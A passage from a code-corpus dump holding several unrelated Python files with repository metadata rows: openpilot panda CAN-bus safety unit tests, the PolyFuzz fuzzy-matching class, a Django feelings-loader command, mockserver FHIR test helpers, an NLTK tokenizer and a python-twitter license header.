RELAY_MALFUNCTION_ADDR: Optional[int] = None
RELAY_MALFUNCTION_BUS: Optional[int] = None
FWD_BLACKLISTED_ADDRS: Dict[int, List[int]] = {} # {bus: [addr]}
FWD_BUS_LOOKUP: Dict[int, int] = {}
@classmethod
def setUpClass(cls):
if cls.__name__ == "PandaSafetyTest" or cls.__name__.endswith('Base'):
cls.safety = None
raise unittest.SkipTest
@abc.abstractmethod
def _user_brake_msg(self, brake):
pass
@abc.abstractmethod
def _speed_msg(self, speed):
pass
@abc.abstractmethod
def _user_gas_msg(self, gas):
pass
@abc.abstractmethod
def _pcm_status_msg(self, enable):
pass
# ***** standard tests for all safety modes *****
def test_tx_msg_in_scanned_range(self):
# the relay malfunction, fwd hook, and spam can tests don't exhaustively
# scan the entire 29-bit address space, only some known important ranges
# make sure SCANNED_ADDRS stays up to date with car port TX_MSGS; new
# model ports should expand the range if needed
for msg in self.TX_MSGS:
self.assertTrue(msg[0] in self.SCANNED_ADDRS, f"{msg[0]=:#x}")
def test_relay_malfunction(self):
# each car has an addr that is used to detect relay malfunction
# if that addr is seen on specified bus, triggers the relay malfunction
# protection logic: both tx_hook and fwd_hook are expected to return failure
self.assertFalse(self.safety.get_relay_malfunction())
self._rx(make_msg(self.RELAY_MALFUNCTION_BUS, self.RELAY_MALFUNCTION_ADDR, 8))
self.assertTrue(self.safety.get_relay_malfunction())
for bus in range(0, 3):
for addr in self.SCANNED_ADDRS:
self.assertEqual(-1, self._tx(make_msg(bus, addr, 8)))
self.assertEqual(-1, self.safety.safety_fwd_hook(bus, make_msg(bus, addr, 8)))
def test_fwd_hook(self):
# some safety modes don't forward anything, while others blacklist msgs
for bus in range(0, 3):
for addr in self.SCANNED_ADDRS:
# assume len 8
msg = make_msg(bus, addr, 8)
fwd_bus = self.FWD_BUS_LOOKUP.get(bus, -1)
if bus in self.FWD_BLACKLISTED_ADDRS and addr in self.FWD_BLACKLISTED_ADDRS[bus]:
fwd_bus = -1
self.assertEqual(fwd_bus, self.safety.safety_fwd_hook(bus, msg), f"{addr=:#x} from {bus=} to {fwd_bus=}")
def test_spam_can_buses(self):
for bus in range(0, 4):
for addr in self.SCANNED_ADDRS:
if all(addr != m[0] or bus != m[1] for m in self.TX_MSGS):
self.assertFalse(self._tx(make_msg(bus, addr, 8)))
def test_default_controls_not_allowed(self):
self.assertFalse(self.safety.get_controls_allowed())
def test_manually_enable_controls_allowed(self):
self.safety.set_controls_allowed(1)
self.assertTrue(self.safety.get_controls_allowed())
self.safety.set_controls_allowed(0)
self.assertFalse(self.safety.get_controls_allowed())
def test_prev_gas(self):
self.assertFalse(self.safety.get_gas_pressed_prev())
for pressed in [self.GAS_PRESSED_THRESHOLD + 1, 0]:
self._rx(self._user_gas_msg(pressed))
self.assertEqual(bool(pressed), self.safety.get_gas_pressed_prev())
def test_allow_engage_with_gas_pressed(self):
self._rx(self._user_gas_msg(1))
self.safety.set_controls_allowed(True)
self._rx(self._user_gas_msg(1))
self.assertTrue(self.safety.get_controls_allowed())
self._rx(self._user_gas_msg(1))
self.assertTrue(self.safety.get_controls_allowed())
def test_disengage_on_gas(self):
self._rx(self._user_gas_msg(0))
self.safety.set_controls_allowed(True)
self._rx(self._user_gas_msg(self.GAS_PRESSED_THRESHOLD + 1))
self.assertFalse(self.safety.get_controls_allowed())
def test_alternative_experience_no_disengage_on_gas(self):
self._rx(self._user_gas_msg(0))
self.safety.set_controls_allowed(True)
self.safety.set_alternative_experience(ALTERNATIVE_EXPERIENCE.DISABLE_DISENGAGE_ON_GAS)
self._rx(self._user_gas_msg(self.GAS_PRESSED_THRESHOLD + 1))
# Test we allow lateral, but not longitudinal
self.assertTrue(self.safety.get_controls_allowed())
self.assertFalse(self.safety.get_longitudinal_allowed())
# Make sure we can re-gain longitudinal actuation
self._rx(self._user_gas_msg(0))
self.assertTrue(self.safety.get_longitudinal_allowed())
def test_prev_brake(self):
self.assertFalse(self.safety.get_brake_pressed_prev())
for pressed in [True, False]:
self._rx(self._user_brake_msg(not pressed))
self.assertEqual(not pressed, self.safety.get_brake_pressed_prev())
self._rx(self._user_brake_msg(pressed))
self.assertEqual(pressed, self.safety.get_brake_pressed_prev())
def test_enable_control_allowed_from_cruise(self):
self._rx(self._pcm_status_msg(False))
self.assertFalse(self.safety.get_controls_allowed())
self._rx(self._pcm_status_msg(True))
self.assertTrue(self.safety.get_controls_allowed())
def test_disable_control_allowed_from_cruise(self):
self.safety.set_controls_allowed(1)
self._rx(self._pcm_status_msg(False))
self.assertFalse(self.safety.get_controls_allowed())
def test_cruise_engaged_prev(self):
for engaged in [True, False]:
self._rx(self._pcm_status_msg(engaged))
self.assertEqual(engaged, self.safety.get_cruise_engaged_prev())
self._rx(self._pcm_status_msg(not engaged))
self.assertEqual(not engaged, self.safety.get_cruise_engaged_prev())
def test_allow_brake_at_zero_speed(self):
# Brake was already pressed
self._rx(self._speed_msg(0))
self._rx(self._user_brake_msg(1))
self.safety.set_controls_allowed(1)
self._rx(self._user_brake_msg(1))
self.assertTrue(self.safety.get_controls_allowed())
self.assertTrue(self.safety.get_longitudinal_allowed())
self._rx(self._user_brake_msg(0))
self.assertTrue(self.safety.get_controls_allowed())
self.assertTrue(self.safety.get_longitudinal_allowed())
# rising edge of brake should disengage
self._rx(self._user_brake_msg(1))
self.assertFalse(self.safety.get_controls_allowed())
self.assertFalse(self.safety.get_longitudinal_allowed())
self._rx(self._user_brake_msg(0)) # reset no brakes
def test_not_allow_brake_when_moving(self):
# Brake was already pressed
self._rx(self._user_brake_msg(1))
self.safety.set_controls_allowed(1)
self._rx(self._speed_msg(self.STANDSTILL_THRESHOLD))
self._rx(self._user_brake_msg(1))
self.assertTrue(self.safety.get_controls_allowed())
self.assertTrue(self.safety.get_longitudinal_allowed())
self._rx(self._speed_msg(self.STANDSTILL_THRESHOLD + 1))
self._rx(self._user_brake_msg(1))
self.assertFalse(self.safety.get_controls_allowed())
self.assertFalse(self.safety.get_longitudinal_allowed())
self._rx(self._speed_msg(0))
def test_sample_speed(self):
self.assertFalse(self.safety.get_vehicle_moving())
# not moving
self.safety.safety_rx_hook(self._speed_msg(0))
self.assertFalse(self.safety.get_vehicle_moving())
# speed is at threshold
self.safety.safety_rx_hook(self._speed_msg(self.STANDSTILL_THRESHOLD))
self.assertFalse(self.safety.get_vehicle_moving())
# past threshold
self.safety.safety_rx_hook(self._speed_msg(self.STANDSTILL_THRESHOLD + 1))
self.assertTrue(self.safety.get_vehicle_moving())
def test_tx_hook_on_wrong_safety_mode(self):
files = os.listdir(os.path.dirname(os.path.realpath(__file__)))
test_files = [f for f in files if f.startswith("test_") and f.endswith(".py")]
current_test = self.__class__.__name__
all_tx = []
for tf in test_files:
test = importlib.import_module("panda.tests.safety."+tf[:-3])
for attr in dir(test):
if attr.startswith("Test") and attr != current_test:
tx = getattr(getattr(test, attr), "TX_MSGS")
if tx is not None and not attr.endswith('Base'):
# No point in comparing different Tesla safety modes
if 'Tesla' in attr and 'Tesla' in current_test:
continue
if {attr, current_test}.issubset({'TestToyotaSafety', 'TestToyotaAltBrakeSafety', 'TestToyotaStockLongitudinal'}):
continue
# TODO: Temporary, should be fixed in panda firmware, safety_honda.h
if attr.startswith('TestHonda'):
# exceptions for common msgs across different hondas
tx = list(filter(lambda m: m[0] not in [0x1FA, 0x30C, 0x33D], tx))
all_tx.append(list([m[0], m[1], attr[4:]] for m in tx))
# make sure we got all the msgs
self.assertTrue(len(all_tx) >= len(test_files)-1)
for tx_msgs in all_tx:
for addr, bus, test_name in tx_msgs:
msg = make_msg(bus, addr)
self.safety.set_controls_allowed(1)
# TODO: this should be blocked
if current_test in ["TestNissanSafety", "TestNissanLeafSafety"] and [addr, bus] in self.TX_MSGS:
continue
self.assertFalse(self._tx(msg), f"transmit of {addr=:#x} {bus=} from {test_name} was allowed")
| 38.329966 | 126 | 0.719694 |
79546d810875686045146318d03c82890be863e2 | 13,024 | py | Python | polyfuzz/polyfuzz.py | darkravager/PolyFuzz | 05485dcd81f60cfe2eb2538a72b96b62405170b2 | [
"MIT"
] | 445 | 2020-11-28T07:49:00.000Z | 2022-03-27T17:54:50.000Z | polyfuzz/polyfuzz.py | darkravager/PolyFuzz | 05485dcd81f60cfe2eb2538a72b96b62405170b2 | [
"MIT"
] | 24 | 2020-12-06T19:16:18.000Z | 2022-03-29T09:51:38.000Z | polyfuzz/polyfuzz.py | darkravager/PolyFuzz | 05485dcd81f60cfe2eb2538a72b96b62405170b2 | [
"MIT"
] | 42 | 2020-12-01T06:33:07.000Z | 2022-02-27T16:02:54.000Z | import logging
import pandas as pd
from typing import List, Mapping, Union, Iterable
from polyfuzz.linkage import single_linkage
from polyfuzz.utils import check_matches, check_grouped, create_logger
from polyfuzz.models import TFIDF, RapidFuzz, Embeddings, BaseMatcher
from polyfuzz.metrics import precision_recall_curve, visualize_precision_recall
logger = create_logger()
class PolyFuzz:
"""
PolyFuzz class for Fuzzy string matching, grouping, and evaluation.
Arguments:
method: the method(s) used for matching. For quick selection of models
select one of the following: "EditDistance", "TF-IDF" or "Embeddings".
If you want more control over the models above, pass
in a model from polyfuzz.models. For examples, see
usage below.
verbose: Changes the verbosity of the model, Set to True if you want
to track the stages of the model.
Usage:
For basic, out-of-the-box usage, run the code below. You can replace "TF-IDF"
with either "EditDistance" or "Embeddings" for quick access to these models:
```python
import polyfuzz as pf
model = pf.PolyFuzz("TF-IDF")
```
If you want more control over the String Matching models, you can load
in these models separately:
```python
tfidf = TFIDF(n_gram_range=(3, 3), min_similarity=0, model_id="TF-IDF-Sklearn")
model = pf.PolyFuzz(tfidf)
```
You can also select multiple models in order to compare performance:
```python
tfidf = TFIDF(n_gram_range=(3, 3), min_similarity=0, model_id="TF-IDF-Sklearn")
edit = EditDistance(n_jobs=-1)
model = pf.PolyFuzz([tfidf, edit])
```
To use embedding models, please use Flair word embeddings:
```python
from flair.embeddings import WordEmbeddings, TransformerWordEmbeddings
fasttext_embedding = WordEmbeddings('news')
bert_embedding = TransformerWordEmbeddings('bert-base-multilingual-cased')
embedding = Embeddings([fasttext_embedding, bert_embedding ], min_similarity=0.0)
model = pf.PolyFuzz(embedding)
```
"""
def __init__(self,
method: Union[str,
BaseMatcher,
List[BaseMatcher]] = "TF-IDF",
verbose: bool = False):
self.method = method
self.matches = None
# Metrics
self.min_precisions = None
self.recalls = None
self.average_precisions = None
# Cluster
self.clusters = None
self.cluster_mappings = None
self.grouped_matches = None
if verbose:
logger.setLevel(logging.DEBUG)
else:
logger.setLevel(logging.WARNING)
def match(self,
from_list: List[str],
to_list: List[str],
top_n: int = 1):
""" Match the from_list of strings to the to_list of strings with whatever models
you have initialized
Arguments:
from_list: The list from which you want mappings
to_list: The list where you want to map to
top_n: The number of matches you want returned. This is currently only implemented
for `polyfuzz.models.TFIDF` and `polyfuzz.models.Embeddings` as they
can computationally handle more comparisons.
Updates:
self.matches: A dictionary with the matches from all models, can
be accessed with `model.get_all_matches` or
`model.get_match("TF-IDF")`
Usage:
After having initialized your models, you can pass through lists of strings:
```python
import polyfuzz as pf
model = pf.PolyFuzz("TF-IDF", model_id="TF-IDF")
model.match(from_list = ["string_one", "string_two"],
to_list = ["string_three", "string_four"])
```
You can access the results matches with `model.get_all_matches` or a specific
model with `model.get_match("TF-IDF")` based on their model_id.
"""
# Standard models - quick access
if isinstance(self.method, str):
if self.method in ["TF-IDF", "TFIDF"]:
self.matches = {"TF-IDF": TFIDF(min_similarity=0, top_n=top_n).match(from_list, to_list)}
elif self.method in ["EditDistance", "Edit Distance"]:
self.matches = {"EditDistance": RapidFuzz().match(from_list, to_list)}
elif self.method in ["Embeddings", "Embedding"]:
self.matches = {"Embeddings": Embeddings(min_similarity=0, top_n=top_n).match(from_list, to_list)}
else:
raise ValueError("Please instantiate the model with one of the following methods: \n"
"* 'TF-IDF'\n"
"* 'EditDistance'\n"
"* 'Embeddings'\n")
logger.info(f"Ran model with model id = {self.method}")
# Custom models
elif isinstance(self.method, BaseMatcher):
self.matches = {self.method.model_id: self.method.match(from_list, to_list)}
logging.info(f"Ran model with model id = {self.method.model_id}")
# Multiple custom models
elif isinstance(self.method, Iterable):
self._update_model_ids()
self.matches = {}
for model in self.method:
self.matches[model.model_id] = model.match(from_list, to_list)
logging.info(f"Ran model with model id = {model.model_id}")
return self
def visualize_precision_recall(self,
kde: bool = False,
save_path: str = None
):
""" Calculate and visualize precision-recall curves
A minimum similarity score might be used to identify
when a match could be considered to be correct. For example,
we can assume that if a similarity score pass 0.95 we are
quite confident that the matches are correct. This minimum
similarity score can be defined as **precision** since it shows
you how precise we believe the matches are at a minimum.
**Recall** can then be defined as as the percentage of matches
found at a certain minimum similarity score. A high recall means
that for a certain minimum precision score, we find many matches.
Arguments:
kde: whether to also visualize the kde plot
save_path: the path to save the resulting image to
Usage:
```python
import polyfuzz as pf
model = pf.PolyFuzz("TF-IDF", model_id="TF-IDF")
model.match(from_list = ["string_one", "string_two"],
to_list = ["string_three", "string_four"])
model.visualize_precision_recall(save_path="results.png")
```
"""
check_matches(self)
self.min_precisions = {}
self.recalls = {}
self.average_precisions = {}
for name, match in self.matches.items():
min_precision, recall, average_precision = precision_recall_curve(match)
self.min_precisions[name] = min_precision
self.recalls[name] = recall
self.average_precisions[name] = average_precision
visualize_precision_recall(self.matches, self.min_precisions, self.recalls, kde, save_path)
def group(self,
model: Union[str, BaseMatcher] = None,
link_min_similarity: float = 0.75,
group_all_strings: bool = False):
""" From the matches, group the `To` matches together using single linkage
Arguments:
model: you can choose one of the models in `polyfuzz.models` to be used as a grouper
link_min_similarity: the minimum similarity between strings before they are grouped
in a single linkage fashion
group_all_strings: if you want to compare a list of strings with itself and then cluster
those strings, set this to True. Otherwise, only the strings that
were mapped To are clustered.
Updates:
self.matches: Adds a column `Group` that is the grouped version of the `To` column
"""
check_matches(self)
self.clusters = {}
self.cluster_mappings = {}
# Standard models - quick access
if isinstance(model, str):
if model in ["TF-IDF", "TFIDF"]:
model = TFIDF(n_gram_range=(3, 3), min_similarity=link_min_similarity)
elif self.method in ["EditDistance", "Edit Distance"]:
model = RapidFuzz()
elif self.method in ["Embeddings", "Embedding"]:
model = Embeddings(min_similarity=link_min_similarity)
else:
raise ValueError("Please instantiate the model with one of the following methods: \n"
"* 'TF-IDF'\n"
"* 'EditDistance'\n"
"* 'Embeddings'\n"
"* Or None if you want to automatically use TF-IDF")
# Use TF-IDF if no model is specified
elif not model:
model = TFIDF(n_gram_range=(3, 3), min_similarity=link_min_similarity)
# Group per model
for name, match in self.matches.items():
self._create_groups(name, model, link_min_similarity, group_all_strings)
def get_ids(self) -> Union[str, List[str], None]:
""" Get all model ids for easier access """
check_matches(self)
if isinstance(self.method, str):
return self.method
elif isinstance(self.method, Iterable):
return [model.model_id for model in self.method]
return None
def get_matches(self, model_id: str = None) -> Union[pd.DataFrame,
Mapping[str, pd.DataFrame]]:
""" Get the matches from one or more models"""
check_matches(self)
if len(self.matches) == 1:
return list(self.matches.values())[0]
elif len(self.matches) > 1 and model_id:
return self.matches[model_id]
return self.matches
def get_clusters(self, model_id: str = None) -> Mapping[str, List[str]]:
""" Get the groupings/clusters from a single model
Arguments:
model_id: the model id of the model if you have specified multiple models
"""
check_matches(self)
check_grouped(self)
if len(self.matches) == 1:
return list(self.clusters.values())[0]
elif len(self.matches) > 1 and model_id:
return self.clusters[model_id]
return self.clusters
def get_cluster_mappings(self, name: str = None) -> Mapping[str, int]:
""" Get the mappings from the `To` column to its respective column """
check_matches(self)
check_grouped(self)
if len(self.matches) == 1:
return list(self.cluster_mappings.values())[0]
elif len(self.matches) > 1 and name:
return self.cluster_mappings[name]
return self.cluster_mappings
def _create_groups(self,
name: str,
model: BaseMatcher,
link_min_similarity: float,
group_all_strings: bool):
""" Create groups based on either the To mappings if you compare two different lists of strings, or
the From mappings if you compare lists of strings that are equal (set group_all_strings to True)
"""
if group_all_strings:
strings = list(self.matches[name].From.dropna().unique())
else:
strings = list(self.matches[name].To.dropna().unique())
# Create clusters
matches = model.match(strings, strings)
clusters, cluster_id_map, cluster_name_map = single_linkage(matches, link_min_similarity)
# Map the `to` list to groups
df = self.matches[name]
df["Group"] = df['To'].map(cluster_name_map).fillna(df['To'])
self.matches[name] = df
# Track clusters and their ids
self.clusters[name] = clusters
self.cluster_mappings[name] = cluster_id_map
def _update_model_ids(self):
""" Update model ids such that there is no overlap between ids """
# Give models a model_id if it didn't already exist
for index, model in enumerate(self.method):
if not model.model_id:
model.model_id = f"Model {index}"
# Update duplicate names
model_ids = [model.model_id for model in self.method]
if len(set(model_ids)) != len(model_ids):
for index, model in enumerate(self.method):
model.model_id = f"Model {index}"
| 39.347432 | 114 | 0.598741 |
79546e16ca277d9150931a586f3b32b499e96abb | 3,058 | py | Python | twitter_feels/apps/thermometer/management/commands/load_feelings.py | michaelbrooks/twitter-feels | 51dc00478f05841f3726edf5f7da7e0a46ae66e8 | [
"MIT"
] | 1 | 2017-02-15T10:55:26.000Z | 2017-02-15T10:55:26.000Z | twitter_feels/apps/thermometer/management/commands/load_feelings.py | michaelbrooks/twitter-feels | 51dc00478f05841f3726edf5f7da7e0a46ae66e8 | [
"MIT"
] | null | null | null | twitter_feels/apps/thermometer/management/commands/load_feelings.py | michaelbrooks/twitter-feels | 51dc00478f05841f3726edf5f7da7e0a46ae66e8 | [
"MIT"
] | null | null | null | import logging
from logging.config import dictConfig
from os import path
from optparse import make_option
import csv
from django.core.management.base import BaseCommand
from datetime import timedelta
from django.utils import timezone
from ...models import FeelingWord
# Setup logging if not already configured
logger = logging.getLogger('thermometer')
if not logger.handlers:
dictConfig({
"version": 1,
"disable_existing_loggers": False,
"handlers": {
"thermometer": {
"level": "DEBUG",
"class": "logging.StreamHandler",
},
},
"thermometer": {
"handlers": ["thermometer"],
"level": "DEBUG"
}
})
class Command(BaseCommand):
"""
Loads feelings from a feelings file into the database.
"""
option_list = BaseCommand.option_list + (
make_option(
'--force',
action='store_true',
dest='force',
default=False,
help='Ignore existing feelings and insert anyway.'
),
make_option(
'--delimiter',
action='store',
dest='delimiter',
default='\t',
help='Delimiter for parsing the feelings file.'
),
make_option(
'--limit',
action='store',
dest='limit',
default=None,
type=int,
help='Just load the first <limit> feelings from the file.'
),
)
args = '<feelings.txt>'
help = "Parses the feelings file from We Feel Fine and adds feelings to the database."
def handle(self, feelings_filename=None, *args, **options):
try:
force = options.get('force', False)
delimiter = options.get('delimiter', '\t')
limit = options.get('limit', None)
if not feelings_filename:
feelings_filename = path.join(path.dirname(__file__), 'feelings.txt')
existing = FeelingWord.objects.count()
if existing and not force:
logger.error("Your database already contains %d FeelingWords! Use --force to ignore.", existing)
return False
logger.info("Loading feelings from %s...", feelings_filename)
# parse the feelings file
with open(feelings_filename, 'rb') as feelings_file:
reader = csv.reader(feelings_file, delimiter=delimiter)
next(reader, None) # skip the header
feelings = []
for row in reader:
word = row[0]
count = row[1]
color = row[2]
feelings.append(FeelingWord(word=word, color=color))
if limit and len(feelings) == limit:
break
FeelingWord.objects.bulk_create(feelings)
logger.info("Created %d feelings", len(feelings))
except Exception as e:
logger.error(e)
| 28.849057 | 112 | 0.545782 |
79546e2ce4f2528149b0ab925e5a431520c06bcf | 12,083 | py | Python | spark_pipeline_framework_testing/tests_common/mock_requests_loader.py | icanbwell/SparkPipelineFramework.Testing | 6dc83fe7afa77aa4107ddb40b6920361460554dc | [
"Apache-2.0"
] | 1 | 2020-10-31T23:25:03.000Z | 2020-10-31T23:25:03.000Z | spark_pipeline_framework_testing/tests_common/mock_requests_loader.py | imranq2/SparkPipelineFramework.Testing | 6dc83fe7afa77aa4107ddb40b6920361460554dc | [
"Apache-2.0"
] | null | null | null | spark_pipeline_framework_testing/tests_common/mock_requests_loader.py | imranq2/SparkPipelineFramework.Testing | 6dc83fe7afa77aa4107ddb40b6920361460554dc | [
"Apache-2.0"
] | null | null | null | import json
import os
from glob import glob
from pathlib import Path
from typing import Dict, Any, List, Optional
from spark_pipeline_framework_testing.mockserver_client.mockserver_client import (
MockServerFriendlyClient,
request,
response,
times,
text_equals,
times_any,
json_equals,
)
def load_mock_fhir_requests_from_folder(
folder: Path,
mock_client: MockServerFriendlyClient,
method: str = "POST",
relative_path: Optional[str] = None,
query_string: Optional[Dict[str, str]] = None,
url_prefix: Optional[str] = None,
response_body: Optional[str] = None,
) -> List[str]:
"""
Loads all .json files from the folder and its sub-folders
from https://pypi.org/project/mockserver-friendly-client/
:param folder: where to look for .json files (recursively)
:param mock_client: client to mock server
:param method:
:param relative_path:
:param query_string:
:param url_prefix:
:param response_body:
"""
file_name: str
files: List[str] = sorted(glob(str(folder.joinpath("**/*.json")), recursive=True))
for file_name in files:
# load file as json
with open(file_name, "r") as file:
contents = json.loads(file.read())
if isinstance(contents, list) and not relative_path:
for fhir_request in contents:
mock_single_request(
fhir_request=fhir_request,
method=method,
mock_client=mock_client,
relative_path=relative_path,
query_string=query_string,
url_prefix=url_prefix,
response_body=response_body,
)
else:
mock_single_request(
fhir_request=contents,
method=method,
mock_client=mock_client,
relative_path=relative_path,
query_string=query_string,
url_prefix=url_prefix,
response_body=response_body,
)
return files
def mock_single_request(
fhir_request: Dict[str, Any],
method: str,
mock_client: MockServerFriendlyClient,
relative_path: Optional[str],
query_string: Optional[Dict[str, str]],
url_prefix: Optional[str],
response_body: Optional[str],
) -> None:
# find id and resourceType
if method == "POST":
# id_ = fhir_request["id"]
# noinspection PyPep8Naming
resourceType = fhir_request["resourceType"]
id_ = fhir_request["id"]
path = (
f"{('/' + url_prefix) if url_prefix else ''}/4_0_0/{resourceType}/1/$merge"
)
payload: str = json.dumps([{"id": id_, "updated": False, "created": True}])
mock_client.expect(
request(
method="POST",
path=path,
body=json_equals([fhir_request]),
),
response(body=payload),
timing=times_any(),
)
print(f"Mocking: POST {mock_client.base_url}{path}: {json.dumps(fhir_request)}")
else:
if not relative_path:
id_ = fhir_request["id"]
# noinspection PyPep8Naming
resourceType = fhir_request["resourceType"]
path = (
f"{('/' + url_prefix) if url_prefix else ''}/4_0_0/{resourceType}/{id_}"
)
mock_client.expect(
request(method="GET", path=path, querystring=query_string),
response(body=json.dumps(fhir_request)),
timing=times(1),
)
else:
path = f"{('/' + url_prefix) if url_prefix else ''}/4_0_0/{relative_path}"
mock_client.expect(
request(method="GET", path=path, querystring=query_string),
response(body=json.dumps(fhir_request)),
timing=times(1),
)
print(f"Mocking: GET {mock_client.base_url}{path}{query_string or ''}")
# noinspection PyPep8Naming
def load_mock_fhir_everything_requests_from_folder(
folder: Path,
mock_client: MockServerFriendlyClient,
resourceType: str,
url_prefix: Optional[str] = None,
) -> List[str]:
"""
Loads all .json files from the folder and its sub-folders
from https://pypi.org/project/mockserver-friendly-client/
:param folder: where to look for .json files (recursively)
:param mock_client:
:param resourceType:
:param url_prefix:
"""
file_name: str
files: List[str] = glob(str(folder.joinpath("**/*.json")), recursive=True)
for file_name in files:
# load file as json
with open(file_name, "r") as file:
fhir_request: Dict[str, Any] = json.loads(file.read())
# find id and resourceType
id_: str = fhir_request["id"]
path = f"{('/' + url_prefix) if url_prefix else ''}/4_0_0/{resourceType}/{id_}/$everything"
mock_client.expect(
request(
method="GET",
path=path,
),
response(body=json.dumps(fhir_request)),
timing=times(1),
)
print(f"Mocking: GET {mock_client.base_url}{path}")
return files
# noinspection PyPep8Naming
def load_mock_fhir_everything_batch_requests_from_folder(
folder: Path,
mock_client: MockServerFriendlyClient,
resourceType: str,
ids: List[str],
url_prefix: Optional[str] = None,
) -> List[str]:
"""
Loads all .json files from the folder and its sub-folders
from https://pypi.org/project/mockserver-friendly-client/
:param folder: where to look for .json files (recursively)
:param mock_client:
:param resourceType:
:param url_prefix:
:param ids: id of resources for this batch to load
"""
file_name: str
files: List[str] = glob(str(folder.joinpath("**/*.json")), recursive=True)
result_bundle = {
"resourceType": "Bundle",
"id": "bundle-example",
"type": "collection",
"entry": [],
}
print(f"mock fhir batch request for {ids}")
for file_name in files:
with open(file_name, "r") as file:
fhir_bundle: Dict[str, Any] = json.loads(file.read())
if "entry" not in fhir_bundle:
print(f"{file_name} has no entry property!")
continue
for entry in fhir_bundle["entry"]:
id = entry.get("resource", {}).get("id", "")
if id in ids:
result_bundle["entry"].append(entry) # type: ignore
# find id and resourceType
path = (
f"{('/' + url_prefix) if url_prefix else ''}/4_0_0/{resourceType}/$everything"
)
mock_client.expect(
request(method="GET", path=path, querystring={"id": ",".join(ids)}),
response(body=json.dumps(result_bundle)),
timing=times(1),
)
print(f"Mocking: GET {mock_client.base_url}{path}")
return files
def load_mock_elasticsearch_requests_from_folder(
folder: Path, mock_client: MockServerFriendlyClient, index: str
) -> List[str]:
"""
Loads all .json files from the folder and its sub-folders
from https://pypi.org/project/mockserver-friendly-client/
:param folder: where to look for .json files (recursively)
:param mock_client:
:param index:
"""
file_name: str
files: List[str] = glob(str(folder.joinpath("**/*.json")), recursive=True)
for file_name in files:
# load file as json
with open(file_name, "r") as file:
lines: List[str] = file.readlines()
http_request: str = "\n".join(
[
(json.dumps(json.loads(line))) if line != "\n" else ""
for line in lines
]
)
# noinspection PyPep8Naming
path = f"/{index}/_bulk"
# noinspection SpellCheckingInspection
mock_client.expect(
request(
method="POST",
path=path,
body=text_equals(http_request),
),
response(
headers={"Content-Type": "application/json"},
body=f"""
{{
"took": 194,
"errors": false,
"items": [
{{
"index": {{
"_index": "{index}",
"_type": "_doc",
"_id": "TESQ93YBW4SQ_M9deEJw",
"_version": 1,
"result": "created"
}}
}},
{{
"index": {{
"_index": "{index}",
"_type": "_doc",
"_id": "TUSQ93YBW4SQ_M9deEJw",
"_version": 1,
"result": "created"
}}
}}
]
}}""",
),
timing=times(1),
)
print(f"Mocking: POST {mock_client.base_url}{path}")
return files
def load_mock_source_api_responses_from_folder(
folder: Path, mock_client: MockServerFriendlyClient, url_prefix: Optional[str]
) -> List[str]:
"""
Mock responses for all files from the folder and its sub-folders
from https://pypi.org/project/mockserver-friendly-client/
:param folder: where to look for files (recursively)
:param mock_client:
:param url_prefix:
"""
file_path: str
files: List[str] = sorted(glob(str(folder.joinpath("**/*")), recursive=True))
for file_path in files:
with open(file_path, "r") as file:
content = file.read()
path = f"{('/' + url_prefix) if url_prefix else ''}/{os.path.basename(file_path)}"
mock_client.expect(
request(
method="GET",
path=path,
),
response(body=content),
timing=times(1),
)
print(f"Mocking: GET {mock_client.base_url}{path}")
return files
def load_mock_source_api_json_responses(
folder: Path,
mock_client: MockServerFriendlyClient,
url_prefix: Optional[str],
add_file_name: Optional[bool] = False,
url_suffix: Optional[str] = None,
) -> List[str]:
"""
Mock responses for all files from the folder and its sub-folders
:param folder: where to look for files (recursively)
:param mock_client:
:param url_prefix: http://{mock_server_url}/{url_prefix}...
:param add_file_name: http://{mock_server_url}/{url_prefix}/{add_file_name}...
:param url_suffix: http://{mock_server_url}/{url_prefix}/{add_file_name}/{url_suffix}?
"""
file_path: str
files: List[str] = sorted(glob(str(folder.joinpath("**/*.json")), recursive=True))
for file_path in files:
file_name = os.path.basename(file_path)
with open(file_path, "r") as file:
content = json.loads(file.read())
try:
request_parameters = content["request_parameters"]
except ValueError:
raise Exception(
"`request_parameters` key not found! It is supposed to contain parameters of the request function."
)
path = f"{('/' + url_prefix) if url_prefix else ''}"
path = f"{path}/{os.path.splitext(file_name)[0]}" if add_file_name else path
if url_suffix:
path = f"{path}/{url_suffix}"
try:
request_result = content["request_result"]
except ValueError:
raise Exception(
"`request_result` key not found. It is supposed to contain the expected result of the requst function."
)
mock_client.expect(
request(path=path, **request_parameters),
response(body=json.dumps(request_result)),
timing=times(1),
)
print(f"Mocking {mock_client.base_url}{path}: {request_parameters}")
return files
| 33.751397 | 123 | 0.564347 |
79546ed1ce17d21396da8e001c3f407a17bde91e | 867 | py | Python | functions/utils.py | muellermax/nlp-disaster-app | bd9af53cb7ae6b2064abdd4843d8d2556ccd523b | [
"Unlicense"
] | null | null | null | functions/utils.py | muellermax/nlp-disaster-app | bd9af53cb7ae6b2064abdd4843d8d2556ccd523b | [
"Unlicense"
] | null | null | null | functions/utils.py | muellermax/nlp-disaster-app | bd9af53cb7ae6b2064abdd4843d8d2556ccd523b | [
"Unlicense"
] | null | null | null | # This module was necessary as after deployment to Heroku the tokenize function could not be found.
# So train_classifier and run both access this file.
from nltk.stem import WordNetLemmatizer
from nltk.tokenize import word_tokenize
from nltk.corpus import stopwords
import nltk
nltk.download('punkt')
nltk.download('wordnet')
nltk.download('stopwords')
import pickle
def tokenize(text):
"""
Function to tokenize and lemmatize a given text.
:param text: String that has to be tokenized and lemmatized.
:return: List of tokenized words.
"""
tokens = word_tokenize(text)
lemmatizer = WordNetLemmatizer()
clean_tokens = []
for tok in tokens:
if tok not in stopwords.words('english'):
clean_tok = lemmatizer.lemmatize(tok).lower().strip()
clean_tokens.append(clean_tok)
return clean_tokens
| 27.09375 | 100 | 0.71857 |
79546f2244899e41c39dd91e4f9a393cd95f43ba | 2,188 | py | Python | twitter/__init__.py | NadiaFida/python-twitter | e62f974fabf28a65eb0094a7fe5324d7ff83308c | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | twitter/__init__.py | NadiaFida/python-twitter | e62f974fabf28a65eb0094a7fe5324d7ff83308c | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | twitter/__init__.py | NadiaFida/python-twitter | e62f974fabf28a65eb0094a7fe5324d7ff83308c | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2007-2018 The Python-Twitter Developers
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
